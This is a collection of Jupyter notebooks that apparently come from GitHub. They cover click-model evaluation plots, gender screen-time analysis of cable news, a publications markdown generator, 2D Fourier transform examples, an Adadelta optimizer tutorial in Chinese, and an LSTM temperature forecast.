model_names: try: model = MODELS[m] params = model.train(train_data) m_utility = [model.utility(params, x['session'], x['serp']) for x in test_data] results.append({'rep': rep_index, 'model': m, 'utility': apply_mask(m_utility, complex_serp_mask), 'sat': sat_labels_complex}) except Exception as e: print >>sys.stderr, 'Exception at rep=%d, m=%s: %s' % (rep_index, m, str(e)) continue per_m_results = collections.defaultdict(lambda: {'u': [], 's': []}) for d in [pd.read_pickle('out_heterogeneous/%d.df' % i) for i in xrange(20)]: for c in d: r = d[c] u = r.utility s = r.sat assert len(u) == 1 assert len(s) == 1 per_m_results[r.name]['u'].append(u[0]) per_m_results[r.name]['s'].append(s[0]) for m, res in per_m_results.iteritems(): print m, scipy.stats.pearsonr(res['u'], res['s'])[0] sat_pearson = pd.DataFrame(results) sat_pearson ``` ## Plot Results ``` FIGS = '<DIRECTORY_TO_OUTPUT_FIGURES>' model_names = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'random', 'DCG', 'uUBM'] colors = sns.color_palette('Set1', n_colors=len(model_names), desat=0.3) pal = {m: colors[k] for k, m in enumerate(model_names)} def restyle(ax): ax.set_xlabel('') ax.set_ylabel('') ax.xaxis.grid(color='white') ax.set_xticklabels(ax.xaxis.get_majorticklabels(), rotation=30) models = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'random', 'uUBM', ] ``` ### Clicks LL ``` ax = sns.boxplot(x='model', y='value', data=d[d['metric'] == 'click'], order=models, palette=pal) restyle(ax) ax.set_ylim([-4.5, -1.4]) ax.figure.savefig(os.path.join(FIGS, 'll_click.pdf')) ``` ### Satisfaction LL ``` sat_data = d[d['metric'] == 'sat'][d['model'].isin(models)] sat_data.set_index(['model', 'rep', 'fold'], inplace=True, verify_integrity=True) sat_data.sort_index(inplace=True) sat_data = sat_data.set_value(('CASnosat', range(N_REPETITIONS), range(N_FOLDS)), 'value', float('NaN')) sat_data.reset_index(level=0, inplace=True) ax = sns.boxplot(x='model', y='value', data=sat_data, order=models, palette=pal) restyle(ax) ax.set_ylim([-0.8, -0.2]) ax.figure.savefig(os.path.join(FIGS, 'll_sat.pdf')) ``` ### Attention feature analysis ``` models_attention = ['CASrank', 'CASnogeom', 'CASnoclass', 'CASnod', 'CAS', ] colors2 = sns.color_palette('Set2', n_colors=3, desat=0.3) pal2 = pal.copy() pal2.update({m: c for m, c in zip(models_attention[:3], colors2)}) ``` #### Clicks ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'click'], order=models_attention, palette=pal2) restyle(ax) ax.set_aspect(8) ax.figure.savefig(os.path.join(FIGS, 'll_click_attention.pdf'), bbox_inches='tight') ``` #### Satisfaction ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'sat'], order=models_attention, palette=pal2) restyle(ax) ax.set_aspect(16) ax.figure.savefig(os.path.join(FIGS, 'll_sat_attention.pdf'), bbox_inches='tight') ``` #### Pearson ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'sat pearson'], order=models_attention, palette=pal2) restyle(ax) ax.figure.savefig(os.path.join(FIGS, 'sat_pearson_attention.pdf'), bbox_inches='tight') ``` ## Train on the whole dataset (to be used with TREC) ``` def picklable_pyclick_model(pyclick_model): return {'attr': pyclick_model.params[pyclick_model.param_names.attr], 'exam': pyclick_model.params[pyclick_model.param_names.exam]} TREC_MODELS = { # 'CAS': click_model.CAS(log_id_to_rel), # 'CAST': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True), # 'CASTnoreg': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, reg_coeff=0), 'CASTnosat': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, sat_term_weight=0), 'CASTnosatnoreg': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, sat_term_weight=0, reg_coeff=0), } for name, model in TREC_MODELS.iteritems(): params = model.train(data) with open('%s.params' % name, 'w') as f: pickle.dump(params, f) ```
github_jupyter
<h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Choose-a-Topic" data-toc-modified-id="Choose-a-Topic-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Choose a Topic</a></span></li><li><span><a href="#Analysis" data-toc-modified-id="Analysis-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Analysis</a></span><ul class="toc-item"><li><span><a href="#Compare-screen-time-across-the-entire-dataset" data-toc-modified-id="Compare-screen-time-across-the-entire-dataset-2.1"><span class="toc-item-num">2.1&nbsp;&nbsp;</span>Compare screen time across the entire dataset</a></span></li><li><span><a href="#Compare-screen-time-by-show" data-toc-modified-id="Compare-screen-time-by-show-2.2"><span class="toc-item-num">2.2&nbsp;&nbsp;</span>Compare screen time by show</a></span><ul class="toc-item"><li><span><a href="#Including-hosts" data-toc-modified-id="Including-hosts-2.2.1"><span class="toc-item-num">2.2.1&nbsp;&nbsp;</span>Including hosts</a></span></li><li><span><a href="#Excluding-hosts" data-toc-modified-id="Excluding-hosts-2.2.2"><span class="toc-item-num">2.2.2&nbsp;&nbsp;</span>Excluding hosts</a></span></li></ul></li></ul></li></ul></div> ``` from esper.prelude import * from esper.stdlib import * from esper.topics import * from esper.spark_util import * from esper.plot_util import * from esper.major_canonical_shows import MAJOR_CANONICAL_SHOWS from datetime import timedelta from collections import defaultdict import _pickle as pickle ``` # Choose a Topic ``` topic = 'vaccine' lexicon = mutual_info(topic) for word, _ in lexicon: print(word) selected_words = '\n'.join(x[0] for x in lexicon) selected_words_set = set() for line in selected_words.split('\n'): line = line.strip() if line == '' or line[0] == '#': continue selected_words_set.add(line) filtered_lexicon = [x for x in lexicon if x[0] in selected_words_set] segments = find_segments(filtered_lexicon, window_size=100, threshold=50, merge_overlaps=True) show_segments(segments[:100]) ``` # Analysis ``` face_genders = get_face_genders() face_genders = face_genders.where( (face_genders.in_commercial == False) & (face_genders.size_percentile >= 25) & (face_genders.gender_id != Gender.objects.get(name='U').id) ) intervals_by_video = defaultdict(list) for video_id, _, interval, _, _ in segments: intervals_by_video[video_id].append(interval) face_genders_with_topic_overlap = annotate_interval_overlap(face_genders, intervals_by_video) face_genders_with_topic_overlap = face_genders_with_topic_overlap.where( face_genders_with_topic_overlap.overlap_seconds > 0) ``` ## Compare screen time across the entire dataset ``` distinct_columns = ['face_id'] overlap_field = 'overlap_seconds' z_score = 1.96 topic_screentime_with_woman = sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, probability_column='female_probability' ) print('Woman on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_woman[0] / 3600, z_score * math.sqrt(topic_screentime_with_woman[1]) / 3600)) topic_screentime_with_man = sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, probability_column='male_probability' ) print('Man on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_man[0] / 3600, z_score * math.sqrt(topic_screentime_with_man[1]) / 3600)) topic_screentime_with_nh_woman = sum_distinct_over_column( face_genders_with_topic_overlap.where((face_genders_with_topic_overlap.host_probability <= 0.5)), overlap_field, distinct_columns, probability_column='female_probability' ) print('Woman (non-host) on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_nh_woman[0] / 3600, z_score * math.sqrt(topic_screentime_with_nh_woman[1]) / 3600)) topic_screentime_with_nh_man = sum_distinct_over_column( face_genders_with_topic_overlap.where((face_genders_with_topic_overlap.host_probability <= 0.5)), overlap_field, distinct_columns, probability_column='male_probability' ) print('Man (non-host) on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_nh_man[0] / 3600, z_score * math.sqrt(topic_screentime_with_nh_man[1]) / 3600)) ``` ## Compare screen time by show ``` canoncal_show_map = { c.id : c.name for c in CanonicalShow.objects.all() } distinct_columns = ['face_id'] group_by_columns = ['canonical_show_id'] overlap_field = 'overlap_seconds' channel_name_cmap = { 'CNN': 'DarkBlue', 'FOXNEWS': 'DarkRed', 'MSNBC': 'DarkGreen' } canoncal_show_cmap = { v['show__canonical_show__name'] : channel_name_cmap[v['channel__name']] for v in Video.objects.distinct( 'show__canonical_show' ).values('show__canonical_show__name', 'channel__name') } ``` ### Including hosts ``` CACHE_BASELINE_INCL_HOST_FILE = '/tmp/base_screentime_gender_incl_host_by_show.pkl' try: with open(CACHE_BASELINE_INCL_HOST_FILE, 'rb') as f: base_screentime_with_man_by_show, base_screentime_with_woman_by_show = pickle.load(f) print('[Base] loaded from cache') except: base_screentime_with_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders, 'duration', distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Woman on screen: done') base_screentime_with_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders, 'duration', distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Man on screen: done') with open(CACHE_BASELINE_INCL_HOST_FILE, 'wb') as f: pickle.dump([base_screentime_with_man_by_show, base_screentime_with_woman_by_show], f) topic_screentime_with_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Woman on screen: done') topic_screentime_with_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Man on screen: done') plot_binary_screentime_proportion_comparison( ['Male (incl-host)', 'Female (incl-host)'], [topic_screentime_with_man_by_show, topic_screentime_with_woman_by_show], 'Proportion of gendered screen time by show for topic "{}"'.format(topic), 'Show name', 'Proportion of screen time', secondary_series_names=['Baseline Male (incl-host)', 'Baseline Female (incl-host)'], secondary_data=[base_screentime_with_man_by_show, base_screentime_with_woman_by_show], subcategory_color_map=canoncal_show_cmap ) ``` ### Excluding hosts ``` CACHE_BASELINE_NO_HOST_FILE = '/tmp/base_screentime_gender_no_host_by_show.pkl' try: with open(CACHE_BASELINE_NO_HOST_FILE, 'rb') as f: base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show = pickle.load(f) print('[Base] loaded from cache') except: base_screentime_with_nh_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders.where(face_genders.host_probability <= 0.25), 'duration', distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Woman (non-host) on screen: done') base_screentime_with_nh_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders.where(face_genders.host_probability <= 0.25), 'duration', distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Man (non-host) on screen: done') with open(CACHE_BASELINE_NO_HOST_FILE, 'wb') as f: pickle.dump([base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show], f) topic_screentime_with_nh_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap.where(face_genders_with_topic_overlap.host_probability <= 0.25), overlap_field, distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Woman (non-host) on screen: done') topic_screentime_with_nh_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap.where(face_genders_with_topic_overlap.host_probability <= 0.25), overlap_field, distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Man (non-host) on screen: done') plot_binary_screentime_proportion_comparison( ['Male (non-host)', 'Female (non-host)'], [topic_screentime_with_nh_man_by_show, topic_screentime_with_nh_woman_by_show], 'Proportion of gendered screen time by show for topic "{}"'.format(topic), 'Show name', 'Proportion of screen time', secondary_series_names=['Baseline Male (non-host)', 'Baseline Female (non-host)'], secondary_data=[base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show], tertiary_series_names=['Male (incl-host)', 'Female (incl-host)'], tertiary_data=[topic_screentime_with_man_by_show, topic_screentime_with_woman_by_show], subcategory_color_map=canoncal_show_cmap ) ```
github_jupyter
# Publications markdown generator for academicpages Takes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data. TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style. ## Data format The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top. - `excerpt` and `paper_url` can be blank, but the others must have values. - `pub_date` must be formatted as YYYY-MM-DD. - `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publications/YYYY-MM-DD-[url_slug]` This is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create). ``` !cat publications.tsv ``` ## Import pandas We are using the very handy pandas library for dataframes. ``` import pandas as pd ``` ## Import TSV Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`. I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others. ``` publications = pd.read_csv("publications.tsv", sep="\t", header=0) publications ``` ## Escape special characters YAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely. ``` html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&apos;" } def html_escape(text): """Produce entities within text.""" return "".join(html_escape_table.get(c,c) for c in text) ``` ## Creating the markdown files This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page. ``` import os for row, item in publications.iterrows(): md_filename = str(item.pub_date) + "-" + item.url_slug + ".md" html_filename = str(item.pub_date) + "-" + item.url_slug year = item.pub_date[:4] ## YAML variables md = "---\ntitle: \"" + item.title + '"\n' md += "layout: archive" + '\n' md += """collection: publications""" md += """\npermalink: /publication/""" + html_filename if len(str(item.excerpt)) > 5: md += "\nexcerpt: '" + html_escape(item.excerpt) + "'" md += "\ndate: " + str(item.pub_date) md += "\nvenue: '" + html_escape(item.venue) + "'" # if len(str(item.paper_url)) > 5: # md += "\npaperurl: '" + item.paper_url + "'" # md += "\ncitation: '" + html_escape(item.citation) + "'" md += "\n---" ## Markdown description for individual page if len(str(item.paper_url)) > 5: # md += "\n[<span style=\"color: #c41e3a\">Download PDF here.</span>](" + item.paper_url + ")\n" md += "\n[Download PDF here.](" + item.paper_url + ")\n" if len(str(item.excerpt)) > 5: md += "\n**Abstract**: " + html_escape(item.excerpt) + "\n" # md += "\nAbstract: " + html_escape(item.description) + "\n" md += "\n**Recommended citation**: " + item.citation md_filename = os.path.basename(md_filename) with open("../_publications/" + md_filename, 'w') as f: f.write(md) ``` These files are in the publications directory, one directory below where we're working from. ``` !ls ../_publications/ !cat ../_publications/2009-10-01-paper-title-number-1.md ```
github_jupyter
# Bidimensional Fourier Transform The BidimensionalFourierTransform computes FFT of functions defined on bidimensional domain and return a ScalarBidimensionalFunction representing the spectrum and the frequency domain. ``` import matplotlib.pyplot as plt import numpy as np from arte.utils.discrete_fourier_transform import \ BidimensionalFourierTransform as bfft from arte.types.domainxy import DomainXY from arte.types.scalar_bidimensional_function import ScalarBidimensionalFunction ``` ### Direct transform of 2D functions In the simplest example we transform a constant function of amplitude=1 defined in the domain [-2,2), sampled on 4x4 grid. As the normalization perserve the total power we expect a spectrum centered in (0,0) with amplitude sqrt(16) ``` sz = 4 spatial_step= 1.0 ampl = 1.0 xy = DomainXY.from_shape((sz, sz), spatial_step) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("Values:\n%s" % abs(spectr.values)) print("Freq X:\n%s" % spectr.xmap) print("Freq Y:\n%s" % spectr.ymap) ``` ### Inverse Transform The inverse transform return the original spatial function, as expected. ``` inverse_spectr = bfft.inverse(spectr) print("Values:\n%s" % inverse_spectr.values) print("Freq X:\n%s" % inverse_spectr.xmap) print("Freq Y:\n%s" % inverse_spectr.ymap) ``` ### Normalization Spectra are normalized to preserve total energy ``` xy = DomainXY.from_xy_vectors(np.linspace(-2,2,4), np.linspace(-4,0,5)) spatial_map = np.random.random(xy.xmap.shape) spatial_funct = ScalarBidimensionalFunction(spatial_map, domain=xy) spectral_funct = bfft.direct(spatial_funct) print("Power of spatial funct %g" % np.linalg.norm(spatial_funct.values)) print("Power of spectral funct %g" % np.linalg.norm(spectral_funct.values)) ``` ### Non centered domain The same example as before, on a spatial domain centered in (3,2) instead of the origin ``` sz = 4 spatial_step= 1.0 ampl = 1.0 xy = DomainXY.from_shape((sz, sz), spatial_step) xy.shift(3, 2) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("Spatial Domain X: %s" % xy.xcoord) print("Spatial Domain Y: %s" % xy.ycoord) print("Spectrum Map:\n%s" % abs(spectr.values)) print("Freq X: %s" % spectr.xcoord) print("Freq Y: %s" % spectr.ycoord) ``` ### Direct transform on rectangular, unevenly spaced domain In the example below the spectrum of a constant function defined on a rectangular domain with regular sampling is computed. With a spatial domain of (x,y)=(20,10) points sampled at dx=0.1 and dy=0.4, we expect the spectral range to have minimum frequencies $(f^{min}_x, f^{min}_y) = (5, 1.25)$ and spectral resolution $(df_x, df_y) = (0.5, 0.25)$ ``` szx, szy = (20,10) stepx, stepy= (0.1, 0.4) ampl = 1.0 xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("spatial domain X: %s" % xy.xcoord) print("spatial domain Y: %s" % xy.ycoord) print("spectral value in (0,0) should be %g" % (np.sqrt(ampl*szx*szy))) print("Check: v(%g,%g) = %g" % ( spectr.xmap[szy//2, szx//2],spectr.ymap[szy//2,szx//2],spectr.values[szy//2,szx//2].real)) freq_step_x, freq_step_y = spectr.domain.step print("Min/Max freq x should be %g. delta_freq_x should be %g" % ( 0.5/stepx, 1/(szx*stepx))) print("Check: freq x min/max/delta %g/%g/%g" % (spectr.xcoord[0], spectr.xcoord[-1], freq_step_x)) print("Min/Max freq y should be %g. delta_freq_x should be %g" % ( 0.5/stepy, 1/(szy*stepy))) print("Check: freq y min/max/delta %g/%g/%g" % (spectr.ycoord[0], spectr.ycoord[-1], freq_step_y)) ``` ### Units The discrete_fourier_transform module preserve units ``` from astropy import units as u szx, szy = (20,10) stepx, stepy= (0.1 * u.m, 0.4*u.kg) ampl = 1.0 * u.V xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) map_in_V= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(map_in_V, domain=xy) spectr = bfft.direct(spatial_funct) print("Spectrum xmap unit: %s" % spectr.xmap.unit) print("Spectrum ymap unit: %s" % spectr.ymap.unit) print("Spectrum xcoord unit: %s" % spectr.xcoord.unit) print("Spectrum ycoord unit: %s" % spectr.ycoord.unit) print("Spectrum value unit: %s" % spectr.values.unit) ``` ### Transform of numpy array The class BidimensionalFourierTransform is meant to be used with ScalarBidimensionalFunction, but it provides also the two methods direct_transform and inverse_transform that can be used with numpy arrays representing the function values. The return value is a complex array, the computation of the frequency domain is demanded to the user. ``` sz = 10 constant_map = np.ones((sz, sz)) * 3.3 res = bfft.direct_transform(constant_map) res[4:7,4:7] from astropy import units as u szx, szy = (20,2) stepx, stepy= (0.1 * u.s, 1*u.kg) ampl = 1.0 * u.V period = 1 * u.s xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) map_in_V= ampl*np.sin( (2*np.pi*xy.xmap/period).to(u.rad, equivalencies=u.dimensionless_angles())) spatial_f = ScalarBidimensionalFunction(map_in_V, domain=xy) spectral_f = bfft.direct(spatial_f) print(np.abs(spectral_f.values)) print(spectral_f.xcoord) print(spectral_f.ycoord) plt.figure() plt.plot(spatial_f.xmap[0,:], spatial_f.values[0,:], '.-') plt.figure() plt.plot(spectral_f.xmap[1,:], np.abs(spectral_f.values)[1,:], '.-') ```
github_jupyter
# Adadelta --- 从0开始 我们在[Adagrad](adagrad-scratch.md)里提到,由于学习率分母上的变量$\mathbf{s}$一直在累加按元素平方的梯度,每个元素的学习率在迭代过程中一直在降低或不变。所以在有些问题下,当学习率在迭代早期降得较快时且当前解依然不理想时,Adagrad在迭代后期可能较难找到一个有用的解。我们在[RMSProp](rmsprop-scratch.md)介绍了应对这一问题的一种方法:对梯度按元素平方使用指数加权移动平均而不是累加。 事实上,Adadelta也是一种应对这个问题的方法。有意思的是,它没有学习率参数。 ## Adadelta算法 Adadelta算法也像RMSProp一样,使用了一个梯度按元素平方的指数加权移动平均变量$\mathbf{s}$,并将其中每个元素初始化为0。在每次迭代中,首先计算[小批量梯度](gd-sgd-scratch.md) $\mathbf{g}$,然后对该梯度按元素平方后做指数加权移动平均并计算$\mathbf{s}$: $$\mathbf{s} := \rho \mathbf{s} + (1 - \rho) \mathbf{g} \odot \mathbf{g} $$ 然后我们计算当前需要更新的参数的变化量: $$ \mathbf{g}^\prime = \frac{\sqrt{\Delta\mathbf{x} + \epsilon}}{\sqrt{\mathbf{s} + \epsilon}} \odot \mathbf{g} $$ 其中$\epsilon$是为了维持数值稳定性而添加的常数,例如$10^{-5}$。和Adagrad一样,模型参数中每个元素都分别拥有自己的学习率。其中$\Delta\mathbf{x}$初始化为零张量,并做如下$\mathbf{g}^\prime$按元素平方的指数加权移动平均: $$\Delta\mathbf{x} := \rho \Delta\mathbf{x} + (1 - \rho) \mathbf{g}^\prime \odot \mathbf{g}^\prime $$ 同样地,最后的参数迭代步骤与小批量随机梯度下降类似。只是这里梯度前的学习率已经被调整过了: $$\mathbf{x} := \mathbf{x} - \mathbf{g}^\prime $$ ## Adadelta的实现 Adadelta的实现很简单。我们只需要把上面的数学公式翻译成代码。 ``` # Adadalta def adadelta(params, sqrs, deltas, rho, batch_size): eps_stable = 1e-5 for param, sqr, delta in zip(params, sqrs, deltas): g = param.grad / batch_size sqr[:] = rho * sqr + (1. - rho) * nd.square(g) cur_delta = nd.sqrt(delta + eps_stable) / nd.sqrt(sqr + eps_stable) * g delta[:] = rho * delta + (1. - rho) * cur_delta * cur_delta param[:] -= cur_delta ``` ## 实验 实验中,我们以线性回归为例。其中真实参数`w`为[2, -3.4],`b`为4.2。我们把算法中基于指数加权移动平均的变量初始化为和参数形状相同的零张量。 ``` from mxnet import ndarray as nd import mxnet as mx from mxnet import autograd from mxnet import gluon import random mx.random.seed(1) random.seed(1) # 生成数据集。 num_inputs = 2 num_examples = 1000 true_w = [2, -3.4] true_b = 4.2 X = nd.random_normal(scale=1, shape=(num_examples, num_inputs)) y = true_w[0] * X[:, 0] + true_w[1] * X[:, 1] + true_b y += .01 * nd.random_normal(scale=1, shape=y.shape) dataset = gluon.data.ArrayDataset(X, y) # 构造迭代器。 import random def data_iter(batch_size): idx = list(range(num_examples)) random.shuffle(idx) for batch_i, i in enumerate(range(0, num_examples, batch_size)): j = nd.array(idx[i: min(i + batch_size, num_examples)]) yield batch_i, X.take(j), y.take(j) # 初始化模型参数。 def init_params(): w = nd.random_normal(scale=1, shape=(num_inputs, 1)) b = nd.zeros(shape=(1,)) params = [w, b] sqrs = [] deltas = [] for param in params: param.attach_grad() # 把算法中基于指数加权移动平均的变量初始化为和参数形状相同的零张量。 sqrs.append(param.zeros_like()) deltas.append(param.zeros_like()) return params, sqrs, deltas # 线性回归模型。 def net(X, w, b): return nd.dot(X, w) + b # 损失函数。 def square_loss(yhat, y): return (yhat - y.reshape(yhat.shape)) ** 2 / 2 ``` 接下来定义训练函数。当epoch大于2时(epoch从1开始计数),学习率以自乘0.1的方式自我衰减。训练函数的period参数说明,每次采样过该数目的数据点后,记录当前目标函数值用于作图。例如,当period和batch_size都为10时,每次迭代后均会记录目标函数值。 ``` %matplotlib inline import matplotlib as mpl mpl.rcParams['figure.dpi']= 120 import matplotlib.pyplot as plt import numpy as np def train(batch_size, rho, epochs, period): assert period >= batch_size and period % batch_size == 0 [w, b], sqrs, deltas = init_params() total_loss = [np.mean(square_loss(net(X, w, b), y).asnumpy())] # 注意epoch从1开始计数。 for epoch in range(1, epochs + 1): for batch_i, data, label in data_iter(batch_size): with autograd.record(): output = net(data, w, b) loss = square_loss(output, label) loss.backward() adadelta([w, b], sqrs, deltas, rho, batch_size) if batch_i * batch_size % period == 0: total_loss.append(np.mean(square_loss(net(X, w, b), y).asnumpy())) print("Batch size %d, Epoch %d, loss %.4e" % (batch_size, epoch, total_loss[-1])) print('w:', np.reshape(w.asnumpy(), (1, -1)), 'b:', b.asnumpy()[0], '\n') x_axis = np.linspace(0, epochs, len(total_loss), endpoint=True) plt.semilogy(x_axis, total_loss) plt.xlabel('epoch') plt.ylabel('loss') plt.show() ``` 使用Adadelta,最终学到的参数值与真实值较接近。 ``` train(batch_size=10, rho=0.9999, epochs=3, period=10) ``` ## 结论 * Adadelta没有学习率参数。 ## 练习 * Adadelta为什么不需要设置学习率参数?它被什么代替了? **吐槽和讨论欢迎点**[这里](https://discuss.gluon.ai/t/topic/2277)
github_jupyter
# 18DCE097 Muskaan Pirani **Project title: Weather Forecast using LSTM** 1. Main aim is to reduce RMSE values for accurate predictions. 2. We have taken dataset from Kaggle to predict the temperature of a particular place. * Train RMSE: 1.39 RMSE * Test RMSE: 1.38 RMSE ``` import numpy import matplotlib.pyplot as plt from pandas import read_csv import math from keras.models import Sequential from keras.layers import Dense, Dropout, LSTM, Bidirectional, GRU from sklearn.preprocessing import MinMaxScaler from sklearn.metrics import mean_squared_error # convert an array of values into a dataset matrix def create_dataset(dataset, look_back=1): dataX, dataY = [], [] for i in range(len(dataset)-look_back-1): a = dataset[i:(i+look_back), 0] dataX.append(a) dataY.append(dataset[i + look_back, 0]) return numpy.array(dataX), numpy.array(dataY) # fix random seed for reproducibility numpy.random.seed(7) # load the dataset dataframe = read_csv('/content/farm_temperature_data.csv', usecols=[1]) dataset = dataframe.values dataset = dataset.astype('float32') dataframe.head() # normalize the dataset scaler = MinMaxScaler(feature_range=(0, 1)) dataset = scaler.fit_transform(dataset) # split into train and test sets train_size = int(len(dataset) * 0.8) test_size = len(dataset) - train_size train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:] # reshape into X=t and Y=t+1 look_back = 1 trainX, trainY = create_dataset(train, look_back) testX, testY = create_dataset(test, look_back) # reshape input to be [samples, time steps, features] trainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1])) testX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1])) # create and fit the LSTM network model = Sequential() model.add(LSTM(64, input_shape=(1, look_back), return_sequences=True)) model.add(LSTM(16, input_shape=(1, look_back), return_sequences=True)) model.add(LSTM(4, input_shape=(1, look_back), return_sequences=False)) model.add(Dropout(0.2)) model.add(Dense(1)) # # create and fit the BiLSTM network # model = Sequential() # model.add(Bidirectional(LSTM(64, input_shape=(1, look_back), return_sequences=True))) # model.add(Bidirectional(LSTM(16, input_shape=(1, look_back), return_sequences=True))) # model.add(Bidirectional(LSTM(4, input_shape=(1, look_back), return_sequences=False))) # model.add(Dense(1)) model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy']) model.fit(trainX, trainY, epochs=20, batch_size=1, verbose=2) # make predictions trainPredict = model.predict(trainX) testPredict = model.predict(testX) # invert predictions trainPredict = scaler.inverse_transform(trainPredict) trainY = scaler.inverse_transform([trainY]) testPredict = scaler.inverse_transform(testPredict) testY = scaler.inverse_transform([testY]) # calculate root mean squared error trainScore = numpy.sqrt(mean_squared_error(trainY[0], trainPredict[:,0])) print('Train Score: %.2f RMSE' % (trainScore)) testScore = numpy.sqrt(mean_squared_error(testY[0], testPredict[:,0])) print('Test Score: %.2f RMSE' % (testScore)) # shift train predictions for plotting plt.figure(figsize=(20,10)) trainPredictPlot = numpy.empty_like(dataset) trainPredictPlot[:, :] = numpy.nan trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict # shift test predictions for plotting testPredictPlot = numpy.empty_like(dataset) testPredictPlot[:, :] = numpy.nan testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict # plot baseline and predictions plt.title("Weather Forecast") plt.xlabel("Days") plt.ylabel("Temperature (Celcius)") plt.plot(scaler.inverse_transform(dataset), label="Actual") plt.plot(trainPredictPlot, label="Prediction (Train)") plt.plot(testPredictPlot, label="Prediction 